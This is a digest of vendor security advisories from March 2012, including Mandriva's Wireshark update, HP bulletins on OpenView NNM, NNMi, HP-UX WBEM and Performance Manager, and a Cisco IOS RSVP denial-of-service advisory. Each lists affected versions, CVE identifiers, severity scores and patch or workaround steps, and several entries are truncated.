[ MDVSA-2012:042 ] wireshark
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:042 http://www.mandriva.com/security/ ___ Package : wireshark Date: March 28, 2012 Affected: 2011. ___ Problem Description: Multiple vulnerabilities was found and corrected in Wireshark: * The ANSI A dissector could dereference a NULL pointer and crash. * The IEEE 802.11 dissector could go into an infinite loop. * The pcap and pcap-ng file parsers could crash trying to read ERF data. * The MP2T dissector could try to allocate too much memory and crash. This advisory provides the latest version of Wireshark (1.6.6) which is not vulnerable to these issues. ___ References: http://www.wireshark.org/security/wnpa-sec-2012-04.html http://www.wireshark.org/security/wnpa-sec-2012-05.html http://www.wireshark.org/security/wnpa-sec-2012-06.html http://www.wireshark.org/security/wnpa-sec-2012-07.html ___ Updated Packages: Mandriva Linux 2011: ea021ca036ceb38f1530e5387df5dcc5 2011/i586/dumpcap-1.6.6-0.1-mdv2011.0.i586.rpm 9cfa609402a364a43128893c75ac3e65 2011/i586/libwireshark1-1.6.6-0.1-mdv2011.0.i586.rpm c1247647ebcb69eaced064db72fec93d 2011/i586/libwireshark-devel-1.6.6-0.1-mdv2011.0.i586.rpm c3cd964180dc7a64083c6d1b94ff4f46 2011/i586/rawshark-1.6.6-0.1-mdv2011.0.i586.rpm 387e8977955d381243f66709e80cc586 2011/i586/tshark-1.6.6-0.1-mdv2011.0.i586.rpm 03bcfb73c00cd43d34f9edeceea2f571 2011/i586/wireshark-1.6.6-0.1-mdv2011.0.i586.rpm 2bd6ffb92d2b8251fad0b7b22c93f37e 2011/i586/wireshark-tools-1.6.6-0.1-mdv2011.0.i586.rpm ab444f989bf59113ff0e900a7087dbd5 2011/SRPMS/wireshark-1.6.6-0.1.src.rpm Mandriva Linux 2011/X86_64: e474457135acb1652912a4f1b0afab19 2011/x86_64/dumpcap-1.6.6-0.1-mdv2011.0.x86_64.rpm 630b3f5e05d4361181f0af5502c3a35e 2011/x86_64/lib64wireshark1-1.6.6-0.1-mdv2011.0.x86_64.rpm e6c12c75778ee83283abf9bec3beb435 2011/x86_64/lib64wireshark-devel-1.6.6-0.1-mdv2011.0.x86_64.rpm f67c069153d5a1959343b072b936ea5c 2011/x86_64/rawshark-1.6.6-0.1-mdv2011.0.x86_64.rpm 878a5fa2fed2df8f58f5242c9745 2011/x86_64/tshark-1.6.6-0.1-mdv2011.0.x86_64.rpm 406544bfb3241f6f02e52761e0b30fd1 2011/x86_64/wireshark-1.6.6-0.1-mdv2011.0.x86_64.rpm 32eb71abbd26ca7a68a2a9b8a66b9fd8 2011/x86_64/wireshark-tools-1.6.6-0.1-mdv2011.0.x86_64.rpm ab444f989bf59113ff0e900a7087dbd5 2011/SRPMS/wireshark-1.6.6-0.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPcurMmqjQ0CJFipgRAiERAKC8XoWF9RE0GBQEsnn79s5/dlyUAQCfT1yC O9926o+K6ALAdK3jC2VqnBw= =qAaT -END PGP SIGNATURE-
[security bulletin] HPSBMU02747 SSRT100771 rev.1 - HP OpenView Network Node Manager (OV NNM) Running Apache Tomcat, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03231290 Version: 1 HPSBMU02747 SSRT100771 rev.1 - HP OpenView Network Node Manager (OV NNM) Running Apache Tomcat, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-03-27 Last Updated: 2012-03-27 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM) running Apache Tomcat. The vulnerabilities could be exploited remotely to create a Denial of Service (DoS). References: CVE-2012-0022, CVE-2011-4858 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Network Node Manager (OV NNM) v7.53 running on HP-UX, Linux, and Solaris. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-0022(AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4858(AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided a hotfix to resolve the vulnerability. The SSRT100771 hotfix is available by contacting the normal HP Services support channel. MANUAL ACTIONS: Yes - NonUpdate Install the hotfix for SSRT100771. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS (for HP-UX) For HP-UX OV NNM 7.53 HP-UX B.11.31 HP-UX B.11.23 (IA) HP-UX B.11.23 (PA) HP-UX B.11.11 = OVNNMgr.OVNNM-RUN,fr=B.07.50.00 action: install the hotfix for SSRT100771 END AFFECTED VERSIONS (for HP-UX) HISTORY Version:1 (rev.1) - 27 March 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk9xzvoACgkQ4B86/C0qfVkxnwCfdMnKaD1xMTP0Y/kvlgBOExuL iPAAnAkQrExylafaMMM6BD+/uRFoAFfS =CxxM -END PGP SIGNATURE-
[security bulletin] HPSBMU02748 SSRT100772 rev.1 - HP OpenView Network Node Manager (OV NNM) Running Apache HTTP Server, Remote Unauthorized Disclosure of Information, Unauthorized Modification, Denia
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03231301 Version: 1 HPSBMU02748 SSRT100772 rev.1 - HP OpenView Network Node Manager (OV NNM) Running Apache HTTP Server, Remote Unauthorized Disclosure of Information, Unauthorized Modification, Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-03-27 Last Updated: 2012-03-27 Potential Security Impact: Remote unauthorized disclosure of information, unauthorized modification, Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM) running Apache HTTP Server. The vulnerabilities could be exploited remotely resulting in unauthorized disclosure of information, unauthorized modification, or Denial of Service (DoS). References: CVE-2012-0053, CVE-2012-0031, CVE-2012-0021, CVE-2011-4317, CVE-2011-3607, CVE-2011-3368 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Network Node Manager (OV NNM) v7.53 running on HP-UX, Linux, and Solaris. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-0053(AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0031(AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6 CVE-2012-0021(AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2011-4317(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2011-3607(AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2011-3368(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided a hotfix to resolve the vulnerabilities. The SSRT100772 hotfix is available by contacting the normal HP Services support channel. MANUAL ACTIONS: Yes - NonUpdate Install the hotfix for SSRT100772. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS (for HP-UX) For HP-UX OV NNM 7.53 HP-UX B.11.31 HP-UX B.11.23 (IA) HP-UX B.11.23 (PA) HP-UX B.11.11 = OVNNMgr.OVNNM-RUN,fr=B.07.50.00 action: install the hotfix for SSRT100772 END AFFECTED VERSIONS (for HP-UX) HISTORY Version:1 (rev.1) - 27 March 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice.
[security bulletin] HPSBMU02744 SSRT100776 rev.2 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03223954
Version: 2
HPSBMU02744 SSRT100776 rev.2 - HP Network Node Manager i (NNMi) for HP-UX,
Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon
as possible.
Release Date: 2012-03-07
Last Updated: 2012-03-27
Potential Security Impact: Remote unauthorized disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Network Node
Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows. The vulnerability
could be remotely exploited resulting in unauthorized disclosure of information.
References: CVE-2007-1858
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Network Node Manager i (NNMi) v8.x, v9.0x, v9.1x for HP-UX, Linux, Solaris,
and Windows
BACKGROUND
CVSS 2.0 Base Metrics
===
Reference Base Vector Base Score
CVE-2007-1858(AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6
===
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following procedure available to resolve the vulnerability.
Backup the appropriate file to another directory.
%NnmInstallDir%\nonOV\jboss\nms\server\nms\deploy\jboss-web.deployer\server.xml
[Windows]
$NnmInstallDir/nonOV/jboss/nms/server/nms/deploy/jboss-web.deployer/server.xml
[HP-UX, Linux, Solaris]
Edit the original server.xml file.
Add the following to the end of the SSL Connector entry. The entry must be one
continuous string with no line breaks.
ciphers=TLS_DHE_RSA_WITH_AES_128_CBC_SHA,TLS_DHE_DSS_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_128_CBC_SHA,SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA,SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA,SSL_RSA_WITH_3DES_EDE_CBC_SHA
For example, in NNMi v9.10 the entry would be:
Connector port=${jboss.https.port} ... ciphers=.../
Save and verify
Save the file.
Stop and restart NNMi.
Bring up the UI to verify that NNMi is still functioning correctly.
MANUAL ACTIONS: Yes - NonUpdate
Edit the server.xml file as described above.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For more
information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS (for HP-UX)
HP-UX B.11.31
HP-UX B.11.23 (IA)
=
HPOvNNM.HPNMSJBOSS
action: edit the server.xml file as described in the Resolution
END AFFECTED VERSIONS (for HP-UX)
HISTORY
Version:1 (rev.1) - 7 March 2012 Initial release
Version:2 (rev.2) - 27 March 2012 Corrected Windows path
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically,
is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the
title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or its
affiliates, subcontractors or suppliers will be liable for
[security bulletin] HPSBUX02755 SSRT100667 rev.1 - HP-UX WBEM, Remote Unauthorized Access to Diagnostic Data
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03221589 Version: 1 HPSBUX02755 SSRT100667 rev.1 - HP-UX WBEM, Remote Unauthorized Access to Diagnostic Data NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-03-27 Last Updated: 2012-03-27 Potential Security Impact: Unauthorized access to diagnostic data Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP-UX WBEM components. The vulnerability could be exploited remotely in HP-UX 11.11 and HP-UX 11.23 to gain unauthorized access to diagnostic data. The vulnerability could be exploited locally in HP-UX 11.31 to gain unauthorized access to diagnostic data. References: CVE-2012-0125 (HP-UX 31), CVE-2012-0126 (HP-UX 11.11 and HP-UX 11.23) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX 11.31 ProviderSvcsBase before C.07.00.08.02 HP-UX 11.31 SysFaultMgmt before C.07.06.03.01 HP-UX 11.31 DASProvider before B.11.31.1203.07.02 HP-UX 11.31 FCProvider before B.11.31.1203.06.02 HP-UX 11.31 RAIDSAProvider before B.11.31.1203.06.02 HP-UX 11.31 SASProvider before B.11.31.1203.05.02 HP-UX 11.23 SysFaultMgmt before B.07.06.01.02 HP-UX 11.11 SysFaultMgmt before A.04.04.03.02 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-0125(AV:L/AC:M/Au:S/C:P/I:P/A:N) 3.0 CVE-2012-0126(AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 Note: The root cause of the vulnerability is the same for HP-UX 11.11, 11.23, and 11.31. However, the vulnerable feature cannot be accessed remotely in HP-UX 11.31. RESOLUTION HP has provided the following to resolve the vulnerability. HP-UX 11i v3 (HP-UX 11.31) WBEMMgmtBundle C.03.01 or subsequent is available for download here: https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=WBEMMgmtBundle HP-UX 11i v2 (HP-UX 11.23) SysFaultMgmt B.07.06.01.02 or subsequent is available for download here: https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=SysFaultMgmt HP-UX 11i v1 (HP-UX 11.11) SysFaultMgmt A.04.04.03.02 or subsequent is available for download here: https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=SysFaultMgmt MANUAL ACTIONS: Yes - Update Install the update as listed above. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS (for HP-UX) HP-UX B.11.31 == SFM-CORE.SFM_PRO_PA SFM-CORE.SFM_PRO_IA SFM-CORE.CPU-TEST-IA SFM-CORE.CTR_PRO_COMM SFM-CORE.CTR_PRO_COREIA SFM-CORE.CTR_PRO_COREPA SFM-CORE.EMT_COREIA SFM-CORE.EMT_COREPA SFM-CORE.EMT_DOC SFM-CORE.EVM_PRO_COMM SFM-CORE.EVM_PRO_COREIA SFM-CORE.EVM_PRO_COREPA SFM-CORE.EVWEB_COMM SFM-CORE.EVWEB_COREIA SFM-CORE.EVWEB_COREPA SFM-CORE.EVWEB_DOC SFM-CORE.EVWEB_GUI_COMM SFM-CORE.EVWEB_GUI_IA SFM-CORE.EVWEB_GUI_PA SFM-CORE.FMD_PRO_COMM SFM-CORE.FMD_PRO_COREIA SFM-CORE.FMD_PRO_COREPA action: install revision C.07.06.03 or subsequent HP-UX B.11.31 == SFM-JOEM-CORE.SFM_PRO_JOEM SFM-JOEM-CORE.CTR_PRO_JOEM SFM-JOEM-CORE.EMT_CORE_JOEM SFM-JOEM-CORE.EMT_DOC_JOEM SFM-JOEM-CORE.EMT_MAN_JOEM SFM-JOEM-CORE.EVM_PRO_JOEM SFM-JOEM-CORE.EVWEB_COR_JOEM SFM-JOEM-CORE.EVWEB_DOC_JOEM SFM-JOEM-CORE.EVWEB_GUI_JOEM SFM-JOEM-CORE.EVWEB_MAN_JOEM SFM-JOEM-CORE.FMD_PRO_JOEM SFM-JOEM-CORE.GS_JOEM SFM-JOEM-CORE.MISC_CORE_JOEM SFM-JOEM-CORE.SFM_JOEM_MAN SFM-JOEM-CORE.SFM_PRO_JOEM SFM-JOEM-CORE.SFM_PRO_JOEM action: install revision C.07.06.03 or subsequent HP-UX B.11.31 == RAIDSA-PROVIDER.RAIDSA-PROV-RUN action: install revision B.11.31.1203.06.02 or subsequent HP-UX B.11.31 == WBEMP-Storage.STORAGE-IP-LIB WBEMP-Storage.STORAGE-IP-RUN WBEMP-Storage.STORAGE-LWE-RUN WBEMP-Storage.STORAGE-PROV-LIB WBEMP-Storage.STORAGE-PROV-RUN action: install revision B.11.31.1203.07.02 or subsequent HP-UX B.11.31 WBEMP-FCP.CSP-LIB WBEMP-FCP.CSP-LIB WBEMP-FCP.CSP-RUN WBEMP-FCP.FCP-IP-LIB WBEMP-FCP.FCP-IP-LIB WBEMP-FCP.FCP-IP-RUN WBEMP-FCP.FCP-IP-RUN WBEMP-FCP.FCP-LIB WBEMP-FCP.FCP-LIB WBEMP-FCP.FCP-NIP-LIB WBEMP-FCP.FCP-NIP-RUN WBEMP-FCP.FCP-RUN action: install revision B.11.31.1203.06.02 or subsequent HP-UX B.11.31
[security bulletin] HPSBMU02756 SSRT100596 rev.1 - HP Performance Manager Running on HP-UX, Linux, Solaris and Windows, Remote Execution of Arbitrary Code, Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03255321 Version: 1 HPSBMU02756 SSRT100596 rev.1 - HP Performance Manager Running on HP-UX, Linux, Solaris and Windows, Remote Execution of Arbitrary Code, Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-03-27 Last Updated: 2012-03-27 Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Performance Manager running on HP-UX, Linux, Solaris, and Windows. The vulnerability could be exploited remotely to execute arbitrary code and to create a Denial of Service (DoS). References: CVE-2012-0127, ZDI-CAN-1340 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Performance Manager v9.00 running on HP-UX, Linux, Solaris, and Windows BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-0127(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Luigi Auriemma for working with the TippingPoint Zero Day Initiative to report this vulnerability to security-al...@hp.com. RESOLUTION HP has provided the following patches to resolve the vulnerability. The patches are available here: http://support.openview.hp.com/selfsolve/patches Operating System Patch Document ID HP-UX PHSS_42753 or subsequent KM1323069 Linux HPPM9L_2 or subsequent KM1323071 Solaris HPPM9S_2 or subsequent KM1323068 Windows HPPM9W_2 or subsequent KM1323075 MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.31 HP-UX B.11.23 == HPOvGC.HPOVGC HPOvPM.HPOVPM action: install PHSS_42753 or subsequent END AFFECTED VERSIONS HISTORY: Version:1 (rev.1) - 27 March 2012 Initial Release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein
Cisco Security Advisory: Cisco IOS Software RSVP Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Cisco IOS Software RSVP Denial of Service Vulnerability Advisory ID: cisco-sa-20120328-rsvp Revision 1.0 For Public Release 2012 March 28 16:00 UTC (GMT) +- Summary === Cisco IOS Software and Cisco IOS XE Software contain a vulnerability in the RSVP feature when used on a device configured with VPN routing and forwarding (VRF) instances. This vulnerability could allow an unauthenticated, remote attacker to cause an interface wedge, which can lead to loss of connectivity, loss of routing protocol adjacency, and other denial of service (DoS) conditions. This vulnerability could be exploited repeatedly to cause an extended DoS condition. A workaround is available to mitigate this vulnerability. Cisco has released free software updates that address this vulnerability. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120328-rsvp Note: The March 28, 2012, Cisco IOS Software Security Advisory bundled publication includes nine Cisco Security Advisories. Each advisory lists the Cisco IOS Software releases that correct the vulnerability or vulnerabilities detailed in the advisory as well as the Cisco IOS Software releases that correct all vulnerabilities in the March 2012 bundled publication. Individual publication links are in Cisco Event Response: Semi-Annual Cisco IOS Software Security Advisory Bundled Publication at the following link: http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_mar12.html Affected Products = Vulnerable Products +-- Only devices with specific configurations are affected. Cisco devices that are running affected Cisco IOS Software or Cisco IOS XE Software versions are vulnerable when they are configured with RSVP and also have one or more VRF interfaces. A device is vulnerable if both the following criteria are met: * At least one VRF is configured without RSVP * At least one other interface (physical or virtual), not in the same VRF, is configured with RSVP Some example scenarios are as follows: * RSVP-Traffic Engineering (RSVP-TE) in Multiprotocol Label Switching (MPLS) infrastructures * Multi-VRF infrastructures * VRF-Lite infrastructures To determine the Cisco IOS Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The system banner confirms that the device is running Cisco IOS Software by displaying text similar to Cisco Internetwork Operating System Software or Cisco IOS Software. The image name displays in parentheses, followed by Version and the Cisco IOS Software release name. Other Cisco devices do not have the show version command or may provide different output. The following example identifies a Cisco product that is running Cisco IOS Software Release 15.0(1)M1 with an installed image name of C3900-UNIVERSALK9-M: Router show version Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2009 by Cisco Systems, Inc. Compiled Wed 02-Dec-09 17:17 by prod_rel_team !--- output truncated Additional information about Cisco IOS Software release naming conventions is available in White Paper: Cisco IOS and NX-OS Software Reference Guide at: http://www.cisco.com/web/about/security/intelligence/ios-ref.html Products Confirmed Not Vulnerable + Cisco IOS-XR software is not affected by this vulnerability. No other Cisco products are currently known to be affected by this vulnerability. Details === Cisco IOS Software and Cisco IOS XE Software contain a vulnerability in the RSVP feature when used on a device configured with VPN routing and forwarding (VRF) instances. This vulnerability could allow an unauthenticated, remote attacker to cause an interface wedge, which can lead to loss of connectivity, loss of routing protocol adjacency, and other denial of service (DoS) conditions. This vulnerability could be exploited repeatedly to cause an extended DoS condition. A device is vulnerable if it is configured with VRF and none of the interfaces in that VRF have RSVP enabled, but any other interface (physical or virtual) does have RSVP enabled. An attacker with some knowledge of the affected infrastructure could exploit this vulnerability by sending RSVP packets to vulnerable devices. Successful exploitation of the vulnerability could allow an attacker to wedge the receive queue of any RSVP ingress interface. A workaround is available to mitigate this vulnerability. In devices that meet the vulnerable configuration criteria, valid RSVP packets could trigger this vulnerability. An attacker with knowledge
Cisco Security Advisory: Multiple Vulnerabilities in Cisco IOS Software Traffic Optimization Features
